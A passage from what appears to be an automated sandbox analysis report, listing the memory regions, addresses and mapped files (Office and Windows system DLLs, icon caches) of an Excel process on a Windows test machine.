0x20f9a1d0000 end_va = 0x20f9a1d0fff entry_point = 0x0 region_type = private name = "private_0x0000020f9a1d0000" filename = "" Region: id = 306 start_va = 0x20f9a1e0000 end_va = 0x20f9a1e3fff entry_point = 0x20f9a1e0000 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 307 start_va = 0x20f9a1f0000 end_va = 0x20f9a1f1fff entry_point = 0x0 region_type = private name = "private_0x0000020f9a1f0000" filename = "" Region: id = 308 start_va = 0x20f9a200000 end_va = 0x20f9a201fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f9a200000" filename = "" Region: id = 309 start_va = 0x20f9a210000 end_va = 0x20f9a233fff entry_point = 0x0 region_type = private name = "private_0x0000020f9a210000" filename = "" Region: id = 310 start_va = 0x20f9a240000 end_va = 0x20f9a240fff entry_point = 0x0 region_type = private name = "private_0x0000020f9a240000" filename = "" Region: id = 311 start_va = 0x20f9a250000 end_va = 0x20f9a258fff entry_point = 0x0 region_type = private name = "private_0x0000020f9a250000" filename = "" Region: id = 312 start_va = 0x20f9a260000 end_va = 0x20f9a267fff entry_point = 0x20f9a260000 region_type = mapped_file name = "windows.storage.dll.mui" filename = "\\Windows\\System32\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\windows.storage.dll.mui") Region: id = 313 start_va = 0x20f9a270000 end_va = 0x20f9a273fff entry_point = 0x20f9a270000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 314 start_va = 0x20f9a280000 end_va = 0x20f9a280fff entry_point = 0x20f9a280000 region_type = mapped_file name = "{dc92199f-58e0-47b2-a19d-f989f346654c}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DC92199F-58E0-47B2-A19D-F989F346654C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{dc92199f-58e0-47b2-a19d-f989f346654c}.2.ver0x0000000000000001.db") Region: id = 315 start_va = 0x20f9a290000 end_va = 0x20f9a291fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f9a290000" filename = "" Region: id = 316 start_va = 0x20f9a2a0000 end_va = 0x20f9a2a3fff entry_point = 0x20f9a2a0000 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 317 start_va = 0x20f9a2b0000 end_va = 0x20f9a2b0fff entry_point = 0x0 region_type = private name = "private_0x0000020f9a2b0000" filename = "" Region: id = 318 start_va = 0x20f9a2c0000 end_va = 0x20f9a2c3fff entry_point = 0x20f9a2c0000 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 319 start_va = 0x20f9a2d0000 end_va = 0x20f9a2e8fff entry_point = 0x0 region_type = private name = "private_0x0000020f9a2d0000" filename = "" Region: id = 320 start_va = 0x20f9a2f0000 end_va = 0x20f9a2f7fff entry_point = 0x0 region_type = private name = "private_0x0000020f9a2f0000" filename = "" Region: id = 321 start_va = 0x20f9a300000 end_va = 0x20f9a318fff entry_point = 0x0 region_type = private name = "private_0x0000020f9a300000" filename = "" Region: id = 322 start_va = 0x20f9a320000 end_va = 0x20f9a338fff entry_point = 0x0 region_type = private name = "private_0x0000020f9a320000" filename = "" Region: id = 323 start_va = 0x20f9a340000 end_va = 0x20f9a343fff entry_point = 0x20f9a340000 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 324 start_va = 0x20f9a350000 end_va = 0x20f9a353fff entry_point = 0x20f9a350000 region_type = mapped_file name = "iconcache_idx.db" filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_idx.db" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_idx.db") Region: id = 325 start_va = 0x20f9a360000 end_va = 0x20f9a361fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f9a360000" filename = "" Region: id = 326 start_va = 0x20f9a370000 end_va = 0x20f9a3b7fff entry_point = 0x0 region_type = private name = "private_0x0000020f9a370000" filename = "" Region: id = 327 start_va = 0x20f9a3c0000 end_va = 0x20f9b38ffff entry_point = 0x0 region_type = private name = "private_0x0000020f9a3c0000" filename = "" Region: id = 328 start_va = 0x20f9b390000 end_va = 0x20f9b465fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f9b390000" filename = "" Region: id = 329 start_va = 0x20f9b470000 end_va = 0x20f9b481fff entry_point = 0x0 region_type = private name = "private_0x0000020f9b470000" filename = "" Region: id = 330 start_va = 0x20f9b490000 end_va = 0x20f9b490fff entry_point = 0x0 region_type = private name = "private_0x0000020f9b490000" filename = "" Region: id = 331 start_va = 0x20f9b4a0000 end_va = 0x20f9b4a1fff entry_point = 0x0 region_type = private name = "private_0x0000020f9b4a0000" filename = "" Region: id = 332 start_va = 0x20f9b4b0000 end_va = 0x20f9b4b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f9b4b0000" filename = "" Region: id = 333 start_va = 0x20f9b4c0000 end_va = 0x20f9b4f5fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f9b4c0000" filename = "" Region: id = 334 start_va = 0x20f9b500000 end_va = 0x20f9b500fff entry_point = 0x0 region_type = private name = "private_0x0000020f9b500000" filename = "" Region: id = 335 start_va = 0x20f9b510000 end_va = 0x20f9b51ffff entry_point = 0x0 region_type = private name = "private_0x0000020f9b510000" filename = "" Region: id = 336 start_va = 0x20f9b520000 end_va = 0x20f9b523fff entry_point = 0x0 region_type = private name = "private_0x0000020f9b520000" filename = "" Region: id = 337 start_va = 0x20f9b530000 end_va = 0x20f9b530fff entry_point = 0x0 region_type = private name = "private_0x0000020f9b530000" filename = "" Region: id = 338 start_va = 0x20f9b540000 end_va = 0x20f9b541fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f9b540000" filename = "" Region: id = 339 start_va = 0x20f9b550000 end_va = 0x20f9b55ffff entry_point = 0x0 region_type = private name = "private_0x0000020f9b550000" filename = "" Region: id = 340 start_va = 0x20f9b560000 end_va = 0x20f9ba3dfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f9b560000" filename = "" Region: id = 341 start_va = 0x20f9ba40000 end_va = 0x20f9bb1ffff entry_point = 0x20f9ba40000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 342 start_va = 0x20f9bb20000 end_va = 0x20f9bb20fff entry_point = 0x0 region_type = private name = "private_0x0000020f9bb20000" filename = "" Region: id = 343 start_va = 0x20f9bb30000 end_va = 0x20f9bb3ffff entry_point = 0x0 region_type = private name = "private_0x0000020f9bb30000" filename = "" Region: id = 344 start_va = 0x20f9bb40000 end_va = 0x20f9bec6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f9bb40000" filename = "" Region: id = 345 start_va = 0x20f9bed0000 end_va = 0x20f9c256fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f9bed0000" filename = "" Region: id = 346 start_va = 0x20f9c260000 end_va = 0x20f9c35ffff entry_point = 0x20f9c260000 region_type = mapped_file name = "iconcache_16.db" filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_16.db" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_16.db") Region: id = 347 start_va = 0x20f9c440000 end_va = 0x20f9c44ffff entry_point = 0x0 region_type = private name = "private_0x0000020f9c440000" filename = "" Region: id = 348 start_va = 0x20f9c450000 end_va = 0x20f9c54ffff entry_point = 0x20f9c450000 region_type = mapped_file name = "iconcache_16.db" filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_16.db" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_16.db") Region: id = 349 start_va = 0x20f9c550000 end_va = 0x20f9c64ffff entry_point = 0x0 region_type = private name = "private_0x0000020f9c550000" filename = "" Region: id = 350 start_va = 0x20f9c650000 end_va = 0x20f9c84ffff entry_point = 0x0 region_type = private name = "private_0x0000020f9c650000" filename = "" Region: id = 351 start_va = 0x20f9c850000 end_va = 0x20f9ca4ffff entry_point = 0x0 region_type = private name = "private_0x0000020f9c850000" filename = "" Region: id = 352 start_va = 0x20f9ca50000 end_va = 0x20f9cba1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000020f9ca50000" filename = "" Region: id = 353 start_va = 0x20f9cbb0000 end_va = 0x20f9ccaffff entry_point = 0x20f9cbb0000 region_type = mapped_file name = "iconcache_16.db" filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_16.db" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_16.db") Region: id = 354 start_va = 0x20f9ccb0000 end_va = 0x20f9cdaffff entry_point = 0x20f9ccb0000 region_type = mapped_file name = "iconcache_16.db" filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_16.db" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_16.db") Region: id = 355 start_va = 0x20f9cdb0000 end_va = 0x20f9cf68fff entry_point = 0x20f9cdb0000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 356 start_va = 0x20f9cf70000 end_va = 0x20f9d7edfff entry_point = 0x20f9cf70000 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\PROGRA~1\\MICROS~2\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\progra~1\\micros~2\\office16\\1033\\grooveintlresource.dll") Region: id = 357 start_va = 0x20f9f8d0000 end_va = 0x20f9f9cffff entry_point = 0x20f9f8d0000 region_type = mapped_file name = "iconcache_16.db" filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_16.db" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_16.db") Region: id = 358 start_va = 0x7ff6c4dd0000 end_va = 0x7ff6c4ddffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4dd0000" filename = "" Region: id = 359 start_va = 0x7ff6c4de0000 end_va = 0x7ff6c4deffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4de0000" filename = "" Region: id = 360 start_va = 0x7ff6c4df0000 end_va = 0x7ff6c4eeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4df0000" filename = "" Region: id = 361 start_va = 0x7ff6c4ef0000 end_va = 0x7ff6c4f12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c4ef0000" filename = "" Region: id = 362 start_va = 0x7ff6c5f00000 end_va = 0x7ff6c7fe0fff entry_point = 0x7ff6c5f00000 region_type = mapped_file name = "excel.exe" filename = "\\Program Files\\Microsoft Office\\Office16\\EXCEL.EXE" (normalized: "c:\\program files\\microsoft office\\office16\\excel.exe") Region: id = 363 start_va = 0x7ffbd7200000 end_va = 0x7ffbd720ffff entry_point = 0x0 region_type = private name = "private_0x00007ffbd7200000" filename = "" Region: id = 364 start_va = 0x7ffbf6ba0000 end_va = 0x7ffbf6cc6fff entry_point = 0x7ffbf6ba0000 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\System32\\networkexplorer.dll" (normalized: "c:\\windows\\system32\\networkexplorer.dll") Region: id = 365 start_va = 0x7ffbf6cd0000 end_va = 0x7ffbf6cf5fff entry_point = 0x7ffbf6cd0000 region_type = mapped_file name = "ehstorapi.dll" filename = "\\Windows\\System32\\EhStorAPI.dll" (normalized: "c:\\windows\\system32\\ehstorapi.dll") Region: id = 366 start_va = 0x7ffbf6e10000 end_va = 0x7ffbf7012fff entry_point = 0x7ffbf6e10000 region_type = mapped_file name = "wpdshext.dll" filename = "\\Windows\\System32\\wpdshext.dll" (normalized: "c:\\windows\\system32\\wpdshext.dll") Region: id = 367 start_va = 0x7ffbf7020000 end_va = 0x7ffbf7093fff entry_point = 0x7ffbf7020000 region_type = mapped_file name = "playtodevice.dll" filename = "\\Windows\\System32\\PlayToDevice.dll" (normalized: "c:\\windows\\system32\\playtodevice.dll") Region: id = 368 start_va = 0x7ffbf70a0000 end_va = 0x7ffbf711efff entry_point = 0x7ffbf70a0000 region_type = mapped_file name = "dlnashext.dll" filename = "\\Windows\\System32\\dlnashext.dll" (normalized: "c:\\windows\\system32\\dlnashext.dll") Region: id = 369 start_va = 0x7ffbf7120000 end_va = 0x7ffbf71ebfff entry_point = 0x7ffbf7120000 region_type = mapped_file name = "windows.storage.search.dll" filename = "\\Windows\\System32\\Windows.Storage.Search.dll" (normalized: "c:\\windows\\system32\\windows.storage.search.dll") Region: id = 370 start_va = 0x7ffbf71f0000 end_va = 0x7ffbf73a2fff entry_point = 0x7ffbf71f0000 region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll") Region: id = 371 start_va = 0x7ffbf73b0000 end_va = 0x7ffbf7452fff entry_point = 0x7ffbf73b0000 region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 372 start_va = 0x7ffbf7460000 end_va = 0x7ffbf76b1fff entry_point = 0x7ffbf7460000 region_type = mapped_file name = "wxpnse.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\WXPNSE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\wxpnse.dll") Region: id = 373 start_va = 0x7ffbf76c0000 end_va = 0x7ffbf7769fff entry_point = 0x7ffbf76c0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_396e892957c7fb25\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_396e892957c7fb25\\comctl32.dll") Region: id = 374 start_va = 0x7ffbf7870000 end_va = 0x7ffbf7887fff entry_point = 0x7ffbf7870000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 375 start_va = 0x7ffbf7d10000 end_va = 0x7ffbf8808fff entry_point = 0x7ffbf7d10000 region_type = mapped_file name = "chart.dll" filename = "\\Program Files\\Microsoft Office\\Office16\\CHART.DLL" (normalized: "c:\\program files\\microsoft office\\office16\\chart.dll") Region: id = 376 start_va = 0x7ffbf8810000 end_va = 0x7ffbf8a32fff entry_point = 0x7ffbf8810000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\riched20.dll") Region: id = 377 start_va = 0x7ffbf8a40000 end_va = 0x7ffbf8ad7fff entry_point = 0x7ffbf8a40000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll") Region: id = 378 start_va = 0x7ffbf8ae0000 end_va = 0x7ffbf8b47fff entry_point = 0x7ffbf8ae0000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 379 start_va = 0x7ffbf8b50000 end_va = 0x7ffbf8bb1fff entry_point = 0x7ffbf8b50000 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\System32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll") Region: id = 380 start_va = 0x7ffbf8bc0000 end_va = 0x7ffbf9e9bfff entry_point = 0x7ffbf8bc0000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso.dll") Region: id = 381 start_va = 0x7ffbf9ea0000 end_va = 0x7ffbfa66bfff entry_point = 0x7ffbf9ea0000 region_type = mapped_file name = "mso99lwin32client.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Mso99Lwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso99lwin32client.dll") Region: id = 382 start_va = 0x7ffbfa670000 end_va = 0x7ffbfaf5afff entry_point = 0x7ffbfa670000 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso40uiwin32client.dll") Region: id = 383 start_va = 0x7ffbfaf60000 end_va = 0x7ffbfb3d7fff entry_point = 0x7ffbfaf60000 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso30win32client.dll") Region: id = 384 start_va = 0x7ffbfb3e0000 end_va = 0x7ffbfb6e3fff entry_point = 0x7ffbfb3e0000 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso20win32client.dll") Region: id = 385 start_va = 0x7ffbfb6f0000 end_va = 0x7ffbfc85bfff entry_point = 0x7ffbfb6f0000 region_type = mapped_file name = "oart.dll" filename = "\\Program Files\\Microsoft Office\\Office16\\OART.DLL" (normalized: "c:\\program files\\microsoft office\\office16\\oart.dll") Region: id = 386 start_va = 0x7ffbfe4b0000 end_va = 0x7ffbfe4e1fff entry_point = 0x7ffbfe4b0000 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\System32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll") Region: id = 387 start_va = 0x7ffc01c60000 end_va = 0x7ffc01f98fff entry_point = 0x7ffc01c60000 region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\System32\\msftedit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll") Region: id = 388 start_va = 0x7ffc02330000 end_va = 0x7ffc0233ffff entry_point = 0x7ffc02330000 region_type = mapped_file name = "atlthunk.dll" filename = "\\Windows\\System32\\atlthunk.dll" (normalized: "c:\\windows\\system32\\atlthunk.dll") Region: id = 389 start_va = 0x7ffc04230000 end_va = 0x7ffc04266fff entry_point = 0x7ffc04230000 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 390 start_va = 0x7ffc04270000 end_va = 0x7ffc04483fff entry_point = 0x7ffc04270000 region_type = mapped_file name = "grooveex.dll" filename = "\\PROGRA~1\\MICROS~2\\Office16\\GROOVEEX.DLL" (normalized: "c:\\progra~1\\micros~2\\office16\\grooveex.dll") Region: id = 391 start_va = 0x7ffc04490000 end_va = 0x7ffc0475dfff entry_point = 0x7ffc04490000 region_type = mapped_file name = "filesyncshell64.dll" filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\OneDrive\\17.3.7294.0108\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\onedrive\\17.3.7294.0108\\amd64\\filesyncshell64.dll") Region: id = 392 start_va = 0x7ffc04760000 end_va = 0x7ffc0476cfff entry_point = 0x7ffc04760000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 393 start_va = 0x7ffc04770000 end_va = 0x7ffc047bcfff entry_point = 0x7ffc04770000 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 394 start_va = 0x7ffc048e0000 end_va = 0x7ffc04905fff entry_point = 0x7ffc048e0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 395 start_va = 0x7ffc04910000 end_va = 0x7ffc049eafff entry_point = 0x7ffc04910000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 396 start_va = 0x7ffc05560000 end_va = 0x7ffc055affff entry_point = 0x7ffc05560000 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll") Region: id = 397 start_va = 0x7ffc055b0000 end_va = 0x7ffc05a4ffff entry_point = 0x7ffc055b0000 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 398 start_va = 0x7ffc05a50000 end_va = 0x7ffc05a99fff entry_point = 0x7ffc05a50000 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\System32\\DataExchange.dll" (normalized: "c:\\windows\\system32\\dataexchange.dll") Region: id = 399 start_va = 0x7ffc05ca0000 end_va = 0x7ffc05d50fff entry_point = 0x7ffc05ca0000 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\System32\\twinapi.dll" (normalized: "c:\\windows\\system32\\twinapi.dll") Region: id = 400 start_va = 0x7ffc05d70000 end_va = 0x7ffc05d8efff entry_point = 0x7ffc05d70000 region_type = mapped_file name = "devdispitemprovider.dll" filename = "\\Windows\\System32\\DevDispItemProvider.dll" (normalized: "c:\\windows\\system32\\devdispitemprovider.dll") Region: id = 401 start_va = 0x7ffc05e00000 end_va = 0x7ffc05e9bfff entry_point = 0x7ffc05e00000 region_type = mapped_file name = "msvcp140.dll" filename = "\\Windows\\System32\\msvcp140.dll" (normalized: "c:\\windows\\system32\\msvcp140.dll") Region: id = 402 start_va = 0x7ffc05ea0000 end_va = 0x7ffc05eb5fff entry_point = 0x7ffc05ea0000 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Windows\\System32\\vcruntime140.dll" (normalized: "c:\\windows\\system32\\vcruntime140.dll") Region: id = 403 start_va = 0x7ffc06410000 end_va = 0x7ffc06423fff entry_point = 0x7ffc06410000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 404 start_va = 0x7ffc06430000 end_va = 0x7ffc06525fff entry_point = 0x7ffc06430000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 405 start_va = 0x7ffc06700000 end_va = 0x7ffc0698dfff entry_point = 0x7ffc06700000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 406 start_va = 0x7ffc06b80000 end_va = 0x7ffc06b90fff entry_point = 0x7ffc06b80000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 407 start_va = 0x7ffc07e60000 end_va = 0x7ffc07edefff entry_point = 0x7ffc07e60000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 408 start_va = 0x7ffc07fd0000 end_va = 0x7ffc07fdbfff entry_point = 0x7ffc07fd0000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 409 start_va = 0x7ffc08000000 end_va = 0x7ffc08009fff entry_point = 0x7ffc08000000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 410 start_va = 0x7ffc08010000 end_va = 0x7ffc081b8fff entry_point = 0x7ffc08010000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\gdiplus.dll") Region: id = 411 start_va = 0x7ffc097b0000 end_va = 0x7ffc09a23fff entry_point = 0x7ffc097b0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 412 start_va = 0x7ffc09e90000 end_va = 0x7ffc09ecffff entry_point = 0x7ffc09e90000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 413 start_va = 0x7ffc0a1a0000 end_va = 0x7ffc0a4d9fff entry_point = 0x7ffc0a1a0000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 414 start_va = 0x7ffc0a4e0000 end_va = 0x7ffc0a563fff entry_point = 0x7ffc0a4e0000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 415 start_va = 0x7ffc0bae0000 end_va = 0x7ffc0baedfff entry_point = 0x7ffc0bae0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 416 start_va = 0x7ffc0bfc0000 end_va = 0x7ffc0bfd1fff entry_point = 0x7ffc0bfc0000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 417 start_va = 0x7ffc0bff0000 end_va = 0x7ffc0bffbfff entry_point = 0x7ffc0bff0000 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 418 start_va = 0x7ffc0c000000 end_va = 0x7ffc0c01ffff entry_point = 0x7ffc0c000000 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 419 start_va = 0x7ffc0c020000 end_va = 0x7ffc0c035fff entry_point = 0x7ffc0c020000 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll") Region: id = 420 start_va = 0x7ffc0c040000 end_va = 0x7ffc0c04afff entry_point = 0x7ffc0c040000 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll") Region: id = 421 start_va = 0x7ffc0c050000 end_va = 0x7ffc0c06afff entry_point = 0x7ffc0c050000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 422 start_va = 0x7ffc0c910000 end_va = 0x7ffc0c964fff entry_point = 0x7ffc0c910000 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 423 start_va = 0x7ffc0cb50000 end_va = 0x7ffc0cbdafff entry_point = 0x7ffc0cb50000 region_type = mapped_file name = "directmanipulation.dll" filename = "\\Windows\\System32\\directmanipulation.dll" (normalized: "c:\\windows\\system32\\directmanipulation.dll") Region: id = 424 start_va = 0x7ffc0cc30000 end_va = 0x7ffc0cc38fff entry_point = 0x7ffc0cc30000 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 